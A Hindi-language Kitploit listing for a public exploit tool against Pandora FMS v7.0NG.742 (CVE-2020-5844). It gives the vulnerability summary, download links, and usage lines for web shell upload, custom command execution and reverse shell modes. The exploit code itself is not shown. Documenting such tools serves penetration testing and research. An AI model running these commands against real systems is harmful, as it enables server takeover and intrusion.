Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
exploit-CVE-2020-5844 — CVE-2020-5844 (Pandora FMS v7.0NG.742) के लिए एक्सप्लॉइट - रिमोट कोड निष्पादन | Kitploit
उपकरण/GitHubGitHub/unicordev/exploit-cve-2020-5844
पेलोड जनरेशनभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगरिमोट एक्सेस टूल
GitHubunicordev/exploit-cve-2020-5844

exploit-CVE-2020-5844

CVE-2020-5844 (Pandora FMS v7.0NG.742) के लिए एक्सप्लॉइट - रिमोट कोड निष्पादन

रिपॉजिटरी देखें
712 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
वेबसाइट

CVE-2020-5844 (Pandora FMS v7.0NG.742) के लिए एक्सप्लॉइट - रिमोट कोड एक्सिक्यूशन

GitHub CVE Cover

इस रेपो को पसंद है? हमें ⭐ दें!

केवल शैक्षिक और अधिकृत सुरक्षा अनुसंधान उद्देश्यों के लिए।

एक्सप्लॉइट लेखक

@UNICORDev द्वारा (@NicPWNs और @Dev-Yeoj)

भेद्यता विवरण

Pandora FMS v7.0 NG में index.php?sec=godmode/extensions&sec2=extensions/files_repo प्रमाणित व्यवस्थापकों को दुर्भावनापूर्ण PHP स्क्रिप्ट अपलोड करने और फ़ाइल स्थान के base64 डिकोडिंग के माध्यम से उन्हें निष्पादित करने की अनुमति देता है। यह v7.0NG.742_FIX_PERL2020 को प्रभावित करता है।

एक्सप्लॉइट विवरण

Pandora FMS के कमजोर संस्करणों पर रिमोट कोड एक्सिक्यूशन के लिए इस एक्सप्लॉइट का उपयोग करें। इसके लिए लक्ष्य IP पता और पोर्ट की आवश्यकता होती है। मान्य उपयोगकर्ता नाम/पासवर्ड या मान्य PHPSESSID कुकी प्रमाणीकरण की आवश्यकता होती है। बेसिक PHP वेब शेल अपलोड करने के लिए डिफ़ॉल्ट मोड में चलाएँ। लक्ष्य पर कस्टम कमांड चलाने के लिए कस्टम कमांड मोड में चलाएँ। अपने द्वारा सेट किए गए लिसनर पर लक्ष्य से रिवर्स शेल प्राप्त करने के लिए रिवर्स शेल मोड में चलाएँ। PHP वेब शेल फ़ाइल का नाम बदलने के लिए वेब शेल कस्टम मोड में चलाएँ।

उपयोग

root@kitploit:~
  python3 exploit-CVE-2020-5844.py -t <target-IP> <target-port> -u <username> <password>
  python3 exploit-CVE-2020-5844.py -t <target-IP> <target-port> -p <PHPSESSID>
  python3 exploit-CVE-2020-5844.py -t <target-IP> <target-port> -p <PHPSESSID> [-c <custom-command>]
  python3 exploit-CVE-2020-5844.py -t <target-IP> <target-port> -p <PHPSESSID> [-s <local-ip> <local-port>]
  python3 exploit-CVE-2020-5844.py -t <target-IP> <target-port> -p <PHPSESSID> [-w <name.php>]
  python3 exploit-CVE-2020-5844.py -h

विकल्प

root@kitploit:~
  -t    Target host and port. Provide target IP address and port.
  -u    Target username and password. Provide username and password to log in to Pandora FMS.
  -p    Target valid PHP session ID. No username or password needed. (Optional)
  -s    Reverse shell mode. Provide local IP address and port. (Optional)
  -c    Custom command mode. Provide command to execute. (Optional)
  -w    Web shell custom mode. Provide custom PHP file name. (Optional)
  -h    Show this help menu.

डाउनलोड

exploit-CVE-2020-5844.py को GitHub से डाउनलोड करें

exploit-CVE-2020-5844.py को ExploitDB से डाउनलोड करें

Searchsploit (ExploitDB)

root@kitploit:~
searchsploit -u
searchsploit -m 50961

लागू होता है

Pandora FMS v7.0NG.742

एक्सप्लॉइट आवश्यकताएँ

  • python3
  • python3:requests

डेमो

उपयोगकर्ता नाम और पासवर्ड के साथ डिफ़ॉल्ट मोड

default

PHPSESSID के साथ डिफ़ॉल्ट मोड

default_sess

कस्टम कमांड मोड

command

रिवर्स शेल मोड

shell

कस्टम वेब शेल नाम मोड

web

श्रेय

  • https://nvd.nist.gov/vuln/detail/CVE-2020-5844
  • https://sourceforge.net/projects/pandora/files/Pandora%20FMS%207.0NG/742_FIX_PERL2020/Tarball/pandorafms_server-7.0NG.742_FIX_PERL2020.tar.gz
  • https://app.hackthebox.com/machines/Pandora
  • https://github.com/TheCyberGeek/CVE-2020-5844
  • https://github.com/shyam0904a/Pandora_v7.0NG.742_exploit_unauthenticated
  • https://www.exploit-db.com/exploits/50961
टूल डाउनलोड करें